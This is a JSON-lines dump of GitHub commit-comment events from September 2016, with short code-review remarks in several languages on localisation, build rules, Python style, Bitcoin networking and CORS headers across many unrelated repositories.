{"id":"4631323736","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208994,"position":27,"line":24,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:10:41Z","updated_at":"2016-09-28T15:10:41Z","body":"\"I nostri risultati\" suona male?"}},"created_at":"2016-09-28T15:10:41Z"}
{"id":"4631324027","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"igortouguinho/EDL"},"payload":{"comment":{"id":19209000,"position":null,"line":null,"path":null,"commit_id":"0b3bc949f03d6efed4a06d6fcd827e8d75b0579a","created_at":"2016-09-28T15:10:44Z","updated_at":"2016-09-28T15:10:44Z","body":"3 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:10:44Z"}
{"id":"4631325316","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209005,"position":100,"line":321,"path":"footparse/soccerway.py","commit_id":"eeec3acba80936074c2023a087f4a99ef939dfa4","created_at":"2016-09-28T15:10:55Z","updated_at":"2016-09-28T15:10:55Z","body":"What does `attr` represent ?"}},"created_at":"2016-09-28T15:10:55Z"}
{"id":"4631325890","type":"CommitCommentEvent","actor":{"login":"mafintosh"},"repo":{"name":"feross/standard"},"payload":{"comment":{"id":19209008,"position":null,"line":null,"path":null,"commit_id":"85e19d6de535d863613d67ad0f6d3bb6eae9bab3","created_at":"2016-09-28T15:11:00Z","updated_at":"2016-09-28T15:11:00Z","body":"why is v4 needed? i use standard but on plenty on modules that support 0.12, 0.10, kinda annoying that i have to pin an old version now."}},"created_at":"2016-09-28T15:11:00Z"}
{"id":"4631327293","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"Icenowy/lc2ksim"},"payload":{"comment":{"id":19209013,"position":12,"line":12,"path":"src/main.cpp","commit_id":"c5f1c4ea71176b2fb3665066851f3a43ed364e5e","created_at":"2016-09-28T15:11:12Z","updated_at":"2016-09-28T15:11:12Z","body":"`new uint32_t[mem_size]{}` should zero-init the mem well."}},"created_at":"2016-09-28T15:11:12Z"}
{"id":"4631329159","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19209019,"position":29,"line":410,"path":"cura/BuildVolume.py","commit_id":"3de4d4987c7beb816723beeed0b5d002b650ebbc","created_at":"2016-09-28T15:11:29Z","updated_at":"2016-09-28T15:11:29Z","body":"This is a rather superfluous line now."}},"created_at":"2016-09-28T15:11:29Z"}
{"id":"4631334108","type":"CommitCommentEvent","actor":{"login":"sirfelic"},"repo":{"name":"sirfelic/sirfelic.github.io"},"payload":{"comment":{"id":19209032,"position":null,"line":null,"path":null,"commit_id":"ab2ed3de070f0d4683325a497a40594e3b91d393","created_at":"2016-09-28T15:12:13Z","updated_at":"2016-09-28T15:12:13Z","body":"ok"}},"created_at":"2016-09-28T15:12:13Z"}
{"id":"4631335638","type":"CommitCommentEvent","actor":{"login":"Chyroc"},"repo":{"name":"Chyroc/WechatSogou"},"payload":{"comment":{"id":19209035,"position":null,"line":null,"path":null,"commit_id":"b10ef41188d74398191f708ac6c08619269dafc9","created_at":"2016-09-28T15:12:27Z","updated_at":"2016-09-28T15:12:27Z","body":"@zzpqhy 参见demo/get_old.py"}},"created_at":"2016-09-28T15:12:27Z"}
{"id":"4631338794","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"jensmcatanho/EDL"},"payload":{"comment":{"id":19209049,"position":null,"line":null,"path":null,"commit_id":"40cbbbf276f1f369b07fc3ce34935b641cb31363","created_at":"2016-09-28T15:12:56Z","updated_at":"2016-09-28T15:12:56Z","body":"3 dos 6 podem melhorar..."}},"created_at":"2016-09-28T15:12:56Z"}
{"id":"4631341177","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19209057,"position":null,"line":null,"path":null,"commit_id":"77a13d8dd312d86ac136e3f2704be14f6c6ae42c","created_at":"2016-09-28T15:13:17Z","updated_at":"2016-09-28T15:13:17Z","body":"Change looks good."}},"created_at":"2016-09-28T15:13:17Z"}
{"id":"4631341880","type":"CommitCommentEvent","actor":{"login":"pmbethe09"},"repo":{"name":"bazelbuild/rules_appengine"},"payload":{"comment":{"id":19209061,"position":61,"line":250,"path":"appengine/appengine.bzl","commit_id":"68b0fa6c83589555092578f143781f6565eca2d1","created_at":"2016-09-28T15:13:24Z","updated_at":"2016-09-28T15:13:24Z","body":"interesting, this change seems to have removed com.google.appengine.api.users.User from the :api import"}},"created_at":"2016-09-28T15:13:24Z"}
{"id":"4631342665","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19209064,"position":2,"line":2,"path":".gitignore","commit_id":"174ddf670988f2cf205744998865d567b91bb9c3","created_at":"2016-09-28T15:13:31Z","updated_at":"2016-09-28T15:13:31Z","body":"Created for Eclipse by gitignore.io, not created by Eclipse ;) "}},"created_at":"2016-09-28T15:13:31Z"}
{"id":"4631346321","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19209073,"position":null,"line":null,"path":null,"commit_id":"63e7ee316e7a6ac6f7038084f4f38db0b9e69d8e","created_at":"2016-09-28T15:14:04Z","updated_at":"2016-09-28T15:14:04Z","body":"\nBuild report #163429050 for sha 63e7ee316e7a6ac6f7038084f4f38db0b9e69d8e:\n\n[![UnitTests](https://img.shields.io/badge/unittests-failed%20%281/7%29%20-red.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-19.38%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3753%20/%2010048%20%2837.35%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.81%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-28T15:14:04Z"}
{"id":"4631349870","type":"CommitCommentEvent","actor":{"login":"mafintosh"},"repo":{"name":"feross/standard"},"payload":{"comment":{"id":19209083,"position":null,"line":null,"path":null,"commit_id":"85e19d6de535d863613d67ad0f6d3bb6eae9bab3","created_at":"2016-09-28T15:14:35Z","updated_at":"2016-09-28T15:14:35Z","body":"i guess this is related to http://eslint.org/docs/user-guide/migrating-to-3.0.0"}},"created_at":"2016-09-28T15:14:35Z"}
{"id":"4631351781","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209087,"position":49,"line":49,"path":"footparse/soccerway.py","commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-28T15:14:52Z","updated_at":"2016-09-28T15:14:52Z","body":"`attr`ium ? `attr`action ? `attr`ape-nigaud ?"}},"created_at":"2016-09-28T15:14:52Z"}
{"id":"4631351933","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209088,"position":5,"line":6,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:14:54Z","updated_at":"2016-09-28T15:14:54Z","body":"Però usando “un internet” si lascia intuire che, a seconda delle scelte, \nci possa essere un certo tipo di Internet.\n\n"}},"created_at":"2016-09-28T15:14:54Z"}
{"id":"4631354149","type":"CommitCommentEvent","actor":{"login":"chromi"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":19209091,"position":null,"line":null,"path":null,"commit_id":"669e5b8bf3a4593261898dcd035359fd29105bbd","created_at":"2016-09-28T15:15:13Z","updated_at":"2016-09-28T15:15:13Z","body":"\n> On 28 Sep, 2016, at 18:01, moeller0 <notifications@github.com> wrote:\n> \n> Well, I cited out of the standard document specifying the use of PTM for XDSL (Rec. ITU-T G.992.3 (04/2009) page 355-364). While certainly not definitiv proof of “truth” what information made you think about bits? \n\nI don’t recall any previous specification of whether they were bits or bytes.  Given the general network-engineering predilection for bits, and the existence of a 64b/65b self-clocking encoding, I naturally assumed that “64/65” meant the latter.\n\nThe code is now corrected, and a little shorter as a result.\n\n - Jonathan Morton\n\n"}},"created_at":"2016-09-28T15:15:13Z"}
{"id":"4631359694","type":"CommitCommentEvent","actor":{"login":"devoncarew"},"repo":{"name":"JetBrains/intellij-plugins"},"payload":{"comment":{"id":19209106,"position":null,"line":null,"path":null,"commit_id":"1ba3c7487b0426cf907ab5bf93a5adb25999309a","created_at":"2016-09-28T15:16:04Z","updated_at":"2016-09-28T15:16:04Z","body":"I know it would be a big refactoring, but it may be work thinking more seriously about running one analysis server instance per project."}},"created_at":"2016-09-28T15:16:04Z"}
{"id":"4631361509","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"jeffersonccomp/EDL"},"payload":{"comment":{"id":19209110,"position":null,"line":null,"path":null,"commit_id":"d4bf8cc96b47bfce111a9e850a7c002d03963555","created_at":"2016-09-28T15:16:20Z","updated_at":"2016-09-28T15:16:20Z","body":"5 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:16:20Z"}
{"id":"4631365889","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209119,"position":79,"line":79,"path":"footparse/soccerway.py","commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-28T15:16:59Z","updated_at":"2016-09-28T15:16:59Z","body":"This pattern (lines 77-79) seems to be used quite often, maybe it could be a private instance method ?"}},"created_at":"2016-09-28T15:16:59Z"}
{"id":"4631366710","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19209121,"position":null,"line":null,"path":null,"commit_id":"ce07ac97d4191c9bbf0e31055e2ceb95e656de27","created_at":"2016-09-28T15:17:06Z","updated_at":"2016-09-28T15:17:06Z","body":"Clock is an objective so it can be mocked for tests. I have since updated test_BaseDaemon.py to show the missing part https://github.com/pizzaisdavid/p2p-project/commit/f3f33811c13af924e01a1c4f57495a8ec74c4c86"}},"created_at":"2016-09-28T15:17:06Z"}
{"id":"4631367592","type":"CommitCommentEvent","actor":{"login":"kchodorow"},"repo":{"name":"bazelbuild/rules_appengine"},"payload":{"comment":{"id":19209124,"position":61,"line":250,"path":"appengine/appengine.bzl","commit_id":"68b0fa6c83589555092578f143781f6565eca2d1","created_at":"2016-09-28T15:17:14Z","updated_at":"2016-09-28T15:17:14Z","body":"Yes.  I actually have a followup change that adds separate libraries for user, test, etc.  I thought it was preferable to have more fine-grained targets (and not 6000 entries in the default classpath), but it is backwards incompatible."}},"created_at":"2016-09-28T15:17:14Z"}
{"id":"4631368454","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19209127,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T15:17:22Z","updated_at":"2016-09-28T15:17:22Z","body":"this setting \r\n![image](https://cloud.githubusercontent.com/assets/720862/18919575/eacc0cba-85c8-11e6-92d0-d46810438de7.png)\r\n\r\nthis setting my normal profile\r\n![image](https://cloud.githubusercontent.com/assets/720862/18919624/1a65cf60-85c9-11e6-9dcd-f53a72125eb2.png)\r\n\r\nthis hottime u can use other name not just hottime\r\n![image](https://cloud.githubusercontent.com/assets/720862/18919683/4d87a652-85c9-11e6-8341-2b392253fcae.png)\r\n"}},"created_at":"2016-09-28T15:17:22Z"}
{"id":"4631368674","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209129,"position":27,"line":24,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:17:24Z","updated_at":"2016-09-28T15:17:24Z","body":"No, OK per i nostri risultati.\n\n\n"}},"created_at":"2016-09-28T15:17:24Z"}
{"id":"4631369897","type":"CommitCommentEvent","actor":{"login":"ThomasKoppensteiner"},"repo":{"name":"runtastic/restfb"},"payload":{"comment":{"id":19209137,"position":7,"line":51,"path":"source/library/com/restfb/Version.java","commit_id":"233f1d50ff34a855d96bb348060f97948fb48224","created_at":"2016-09-28T15:17:35Z","updated_at":"2016-09-28T15:17:35Z","body":"Please fix Indentation and if possible change \"Version_2_2\" to \"VERSION_2_2\"."}},"created_at":"2016-09-28T15:17:35Z"}
{"id":"4631370053","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-krl-stdlib"},"payload":{"comment":{"id":19209138,"position":null,"line":null,"path":null,"commit_id":"b6624d04e0b33a3b704fc14ab7d1de8d83d5f990","created_at":"2016-09-28T15:17:36Z","updated_at":"2016-09-28T15:17:36Z","body":"for definition of this operator, see https://picolabs.atlassian.net/wiki/display/docs/Predicate+Expressions#PredicateExpressions-Membership"}},"created_at":"2016-09-28T15:17:36Z"}
{"id":"4631370702","type":"CommitCommentEvent","actor":{"login":"mmterpstra"},"repo":{"name":"ndaniel/fusioncatcher"},"payload":{"comment":{"id":19209142,"position":null,"line":null,"path":null,"commit_id":"72913b3ed74104aaf2575dfccd7ff9f43a9b4006","created_at":"2016-09-28T15:17:42Z","updated_at":"2016-09-28T15:17:42Z","body":"Great thanks,\r\ncommit for closing issue #24"}},"created_at":"2016-09-28T15:17:42Z"}
{"id":"4631370732","type":"CommitCommentEvent","actor":{"login":"netblue30"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":19209143,"position":25,"line":87,"path":"src/firejail/sandbox.c","commit_id":"ae0e5b667d7756f5a4e318c37aefb0a827abbf25","created_at":"2016-09-28T15:17:42Z","updated_at":"2016-09-28T15:17:42Z","body":"Yes, you are right. I'll put it in today."}},"created_at":"2016-09-28T15:17:42Z"}
{"id":"4631371231","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209148,"position":7,"line":7,"path":"src/com/DimezisCheck/MostSimplePolindrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:17:47Z","updated_at":"2016-09-28T15:17:47Z","body":"boolean `answer` can be removed.\r\nJust use `return sb.equals(sb.reverse());`"}},"created_at":"2016-09-28T15:17:47Z"}
{"id":"4631372931","type":"CommitCommentEvent","actor":{"login":"devoncarew"},"repo":{"name":"JetBrains/intellij-plugins"},"payload":{"comment":{"id":19209151,"position":null,"line":null,"path":null,"commit_id":"ba0c842cf4de312b14703e2053a883e11bc01ca1","created_at":"2016-09-28T15:18:02Z","updated_at":"2016-09-28T15:18:02Z","body":"🎆 "}},"created_at":"2016-09-28T15:18:02Z"}
{"id":"4631373646","type":"CommitCommentEvent","actor":{"login":"sipa"},"repo":{"name":"sdaftuar/bitcoin"},"payload":{"comment":{"id":19209152,"position":5,"line":5288,"path":"src/main.cpp","commit_id":"d990722b56f02f3272c49eeef4c952992bd9efaa","created_at":"2016-09-28T15:18:08Z","updated_at":"2016-09-28T15:18:08Z","body":"Right, we'd still not set fProvidesHeaderAndIDs if the peer only supported a v3, so there is no issue with a hypothetical v3. However, we should check fProvidesHeaderAndIDs in this commit to prevent us fetching from non-cb peers?"}},"created_at":"2016-09-28T15:18:08Z"}
{"id":"4631373723","type":"CommitCommentEvent","actor":{"login":"morenoh149"},"repo":{"name":"rt2zz/react-native-contacts"},"payload":{"comment":{"id":19209153,"position":null,"line":null,"path":null,"commit_id":"15ff1686e0437bf3e72fb92c9d5dbaf50c7daef4","created_at":"2016-09-28T15:18:09Z","updated_at":"2016-09-28T15:18:09Z","body":"not by me. We do need more testers."}},"created_at":"2016-09-28T15:18:09Z"}
{"id":"4631376707","type":"CommitCommentEvent","actor":{"login":"pmbethe09"},"repo":{"name":"bazelbuild/rules_appengine"},"payload":{"comment":{"id":19209161,"position":61,"line":250,"path":"appengine/appengine.bzl","commit_id":"68b0fa6c83589555092578f143781f6565eca2d1","created_at":"2016-09-28T15:18:34Z","updated_at":"2016-09-28T15:18:34Z","body":"Not backwards compatible for me...  I had a dep on\n\n@com_google_appengine_java//:api\n\nand that got me package com.google.appengine.api.users\n\nAfter updating to this commit, it fails to build.\n\nOn Wed, Sep 28, 2016 at 11:17 AM, Kristina <notifications@github.com> wrote:\n\n> Yes. I actually have a followup change that adds separate libraries for\n> user, test, etc. I thought it was preferable to have more fine-grained\n> targets (and not 6000 entries in the default classpath), but it is\n> backwards incompatible.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bazelbuild/rules_appengine/commit/68b0fa6c83589555092578f143781f6565eca2d1#commitcomment-19209124>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALF-0n3rRpn0DLs3h--FFM8Zj_L_1pmTks5quoT7gaJpZM4KI8xd>\n> .\n>\n"}},"created_at":"2016-09-28T15:18:34Z"}
{"id":"4631377645","type":"CommitCommentEvent","actor":{"login":"cash"},"repo":{"name":"cabishop/dorset-framework"},"payload":{"comment":{"id":19209164,"position":null,"line":null,"path":null,"commit_id":"0395eb581a02ad42b9899507a83f767a761e86d8","created_at":"2016-09-28T15:18:43Z","updated_at":"2016-09-28T15:18:43Z","body":"This references #14\r\n\r\nThinking out loud here...\r\n\r\nOur user interface use cases so far:\r\n   * command line client\r\n   * mobile application (let's assume single user app)\r\n   * web ui\r\n   * device (Raspberry Pi)\r\n   * chat bot\r\n\r\nFor the command line client and mobile application we can assume a single user so the user information can be configured and the Dorset application only has to work with the single user. The same might be true for the device.\r\n\r\nA chat bot could get the user from the chat API. A user has written something like `@dorset` and so we can get the username. Maybe we can get additional information from the chat API than just username. If not, we would need to have user information stored. So chat bot user code could look like this:\r\n\r\n```java\r\nSlackUser slackUser = event.getSender();\r\nString username = slackUser.getUsername();\r\nUser user = userService.getUser(username);\r\nRequest request = new Request(message, user);\r\nResponse response = app.process(request);\r\n```\r\n\r\nIn that example the user service knows how to map a username string to a User object. The Dorset Application does not need to know anything about the user service.\r\n\r\nFor web UIs, a token is being exchanged that represents the user and that is used to load the user's data and inject it into the request. It ends up working very similarly to the chat bot example.\r\n\r\nFrom these use cases, I think we need to support 2 ways to include a user in a request:\r\n   1. The original request is created with a user object. This user object is probably obtained from a user service. Examples: chat bot and web ui.\r\n   2. The Dorset Application gets a user set. It adds it to the Request on each call (rather than adding it to just the AgentRequest). This means the AgentRequest should have a constructor that takes in a Request rather than extracting out parameters from Request and passing those in to the AgentRequest ctor. \r\n"}},"created_at":"2016-09-28T15:18:43Z"}
{"id":"4631378924","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209168,"position":47,"line":40,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:18:54Z","updated_at":"2016-09-28T15:18:54Z","body":"Sì, era la mia prima opzione, però secondo me Lean Data, a meno di \ncercarlo, è abbastanza incomprensibile.\n\n\n"}},"created_at":"2016-09-28T15:18:54Z"}
{"id":"4631380041","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"JemilleMartins/EDL"},"payload":{"comment":{"id":19209170,"position":null,"line":null,"path":null,"commit_id":"d66081ca64ab7f8dcf9f8a0322a20c8daedda09f","created_at":"2016-09-28T15:19:04Z","updated_at":"2016-09-28T15:19:04Z","body":"3 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:19:04Z"}
{"id":"4631380433","type":"CommitCommentEvent","actor":{"login":"ardan-bkennedy"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19209171,"position":60,"line":60,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T15:19:08Z","updated_at":"2016-09-28T15:19:08Z","body":"We need consistency here with the variable for item. I don't care which form but since it represents a word it was throwing me off. "}},"created_at":"2016-09-28T15:19:08Z"}
{"id":"4631380702","type":"CommitCommentEvent","actor":{"login":"trdm"},"repo":{"name":"trdm/EasyPaint"},"payload":{"comment":{"id":19209172,"position":null,"line":null,"path":null,"commit_id":"6f44830028e40970768c88995685fbfcf5f5bc6e","created_at":"2016-09-28T15:19:11Z","updated_at":"2016-09-28T15:19:11Z","body":"Добавил бинарную сборку для windows."}},"created_at":"2016-09-28T15:19:11Z"}
{"id":"4631380785","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209173,"position":122,"line":122,"path":"footparse/soccerway.py","commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-28T15:19:11Z","updated_at":"2016-09-28T15:19:11Z","body":"What does `cls` refer to here ? I think it is not recommended to use it as a variable name as it usually represents the class itself. \r\nhttps://www.python.org/dev/peps/pep-0008/#function-and-method-arguments"}},"created_at":"2016-09-28T15:19:11Z"}
{"id":"4631382621","type":"CommitCommentEvent","actor":{"login":"trdm"},"repo":{"name":"trdm/EasyPaint"},"payload":{"comment":{"id":19209177,"position":null,"line":null,"path":null,"commit_id":"6f44830028e40970768c88995685fbfcf5f5bc6e","created_at":"2016-09-28T15:19:28Z","updated_at":"2016-09-28T15:19:28Z","body":"Добавил бинарную сборку для windows."}},"created_at":"2016-09-28T15:19:28Z"}
{"id":"4631382710","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/trezor-agent"},"payload":{"comment":{"id":19209178,"position":null,"line":null,"path":null,"commit_id":"96eede9c83163e9f3bf95187834778199c389681","created_at":"2016-09-28T15:19:29Z","updated_at":"2016-09-28T15:19:29Z","body":"Should fix #33 "}},"created_at":"2016-09-28T15:19:29Z"}
{"id":"4631382759","type":"CommitCommentEvent","actor":{"login":"ejcx"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19209179,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T15:19:30Z","updated_at":"2016-09-28T15:19:30Z","body":"I should note, it probably is not a breaking change if you continue to return \"access-control-allow-credentials: true\" and \"access-control-allow-credentials: *\" for origin: '*'.\r\n\r\nUAs will not send the credentials if the access-control-allow-origin header is a *.\r\n\r\nIf it is a breaking change, your site is vulnerable to origin reflection..."}},"created_at":"2016-09-28T15:19:30Z"}
{"id":"4631384124","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"SimonDanisch/FixedSizeArrays.jl"},"payload":{"comment":{"id":19209185,"position":null,"line":null,"path":null,"commit_id":"bee7d982e3622e5b107fbd3be07758d5925c3ea0","created_at":"2016-09-28T15:19:42Z","updated_at":"2016-09-28T15:19:42Z","body":"make it an allowed failure so it still runs but doesn't make your status red"}},"created_at":"2016-09-28T15:19:42Z"}
{"id":"4631384328","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19209186,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T15:19:44Z","updated_at":"2016-09-28T15:19:44Z","body":"if log say 100/100 it will auto change to profile you set make sure you set profile correct\r\n![image](https://cloud.githubusercontent.com/assets/720862/18919817/a423fc86-85c9-11e6-8f57-49a99c5de030.png)\r\n"}},"created_at":"2016-09-28T15:19:44Z"}
{"id":"4631385788","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209191,"position":176,"line":176,"path":"footparse/soccerway.py","commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-28T15:19:57Z","updated_at":"2016-09-28T15:19:57Z","body":"I love the name 😄 "}},"created_at":"2016-09-28T15:19:57Z"}
{"id":"4631388108","type":"CommitCommentEvent","actor":{"login":"DanielEnglisch"},"repo":{"name":"DanielEnglisch/TheProject"},"payload":{"comment":{"id":19209196,"position":null,"line":null,"path":null,"commit_id":"f59b04706eb0d807278ca7fc021fdb70cce4252a","created_at":"2016-09-28T15:20:18Z","updated_at":"2016-09-28T15:20:18Z","body":"Uhh this is good ![](http://i.imgur.com/A1xHkTq.jpg)"}},"created_at":"2016-09-28T15:20:18Z"}
{"id":"4631388836","type":"CommitCommentEvent","actor":{"login":"huenato"},"repo":{"name":"huenato/iBlueIt"},"payload":{"comment":{"id":19209197,"position":null,"line":null,"path":null,"commit_id":"afa893971ac565cfd50e4d2c418cdc7f71d3c7ed","created_at":"2016-09-28T15:20:24Z","updated_at":"2016-09-28T15:20:24Z","body":"@atscream02 I don't have the code anymore, neither play the game."}},"created_at":"2016-09-28T15:20:24Z"}
{"id":"4631389475","type":"CommitCommentEvent","actor":{"login":"Muthukumars1994"},"repo":{"name":"Muthukumars1994/Helios"},"payload":{"comment":{"id":19209198,"position":1,"line":1,"path":"README.md","commit_id":"0c1e3f9e8ef253eba30f96d81854c48fa841b14a","created_at":"2016-09-28T15:20:30Z","updated_at":"2016-09-28T15:20:30Z","body":"<html>\r\n<head>\r\n<body>\r\n<title>just started</title></head>\r\n<p>Just started with git</p>`\r\n</body>\r\n</html>"}},"created_at":"2016-09-28T15:20:30Z"}
{"id":"4631390373","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209199,"position":7,"line":7,"path":"src/com/DimezisCheck/Polendrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:20:38Z","updated_at":"2016-09-28T15:20:38Z","body":"Can be replaced with `str.toCharArray()`"}},"created_at":"2016-09-28T15:20:38Z"}
{"id":"4631390604","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19209200,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T15:20:40Z","updated_at":"2016-09-28T15:20:40Z","body":"The question is not to know if I read it. The question is: did you do any search about how to do that with Yii before you integrate it? And that's the main problem. Adding new classes, out of nowhere, for a task we decided to do later, and without having a look about how other Yii devs deal with this problem before. "}},"created_at":"2016-09-28T15:20:40Z"}
{"id":"4631391393","type":"CommitCommentEvent","actor":{"login":"xfalcox"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19209203,"position":9,"line":22,"path":"app/assets/javascripts/discourse/templates/mobile/discovery/topics.hbs","commit_id":"2ce8845c899930a9553385f542df0fc6cc0ab69d","created_at":"2016-09-28T15:20:47Z","updated_at":"2016-09-28T15:20:47Z","body":"They are tested in here:\r\n\r\nhttps://github.com/discourse/discourse/blob/master/app/assets/javascripts/discourse/components/topic-list.js.es6#L37\r\n\r\nSo it's either a condition there or passing here. It's better the other way around?"}},"created_at":"2016-09-28T15:20:47Z"}
{"id":"4631391791","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/trezor-agent"},"payload":{"comment":{"id":19209206,"position":null,"line":null,"path":null,"commit_id":"03650550dd6b41035b48d6d10a9339019a2005f0","created_at":"2016-09-28T15:20:50Z","updated_at":"2016-09-28T15:20:50Z","body":"Should help with #11 (better support for Python 3)"}},"created_at":"2016-09-28T15:20:50Z"}
{"id":"4631393469","type":"CommitCommentEvent","actor":{"login":"CzlowiekKuktas"},"repo":{"name":"CodeCrafter47/BungeeTabListPlus"},"payload":{"comment":{"id":19209209,"position":null,"line":null,"path":null,"commit_id":"49404bbfc797f97ae7351fd581712d8728c73b51","created_at":"2016-09-28T15:21:06Z","updated_at":"2016-09-28T15:21:06Z","body":"This fixes #131 ?"}},"created_at":"2016-09-28T15:21:06Z"}
{"id":"4631396606","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209218,"position":111,"line":111,"path":"tests/test_soccerway.py","commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-28T15:21:34Z","updated_at":"2016-09-28T15:21:34Z","body":"Good idea to make comments like these! 👍 "}},"created_at":"2016-09-28T15:21:34Z"}
{"id":"4631398716","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19209221,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-28T15:21:53Z","updated_at":"2016-09-28T15:21:53Z","body":"I like the idea of having support for delayed jobs.\r\n\r\nMoving delayed_jobs over to incoming_jobs could be the responsibility of a new GenServer, just like other parts of Toniq is designed.\r\n\r\nI think I would like to call them delayed jobs rather than suspended jobs as delaying a job is what you usually want to do. Delaying for infinity and manually restoring jobs could be a feature of that. You could also use such a feature to flush all/some delayed jobs before they are due."}},"created_at":"2016-09-28T15:21:53Z"}
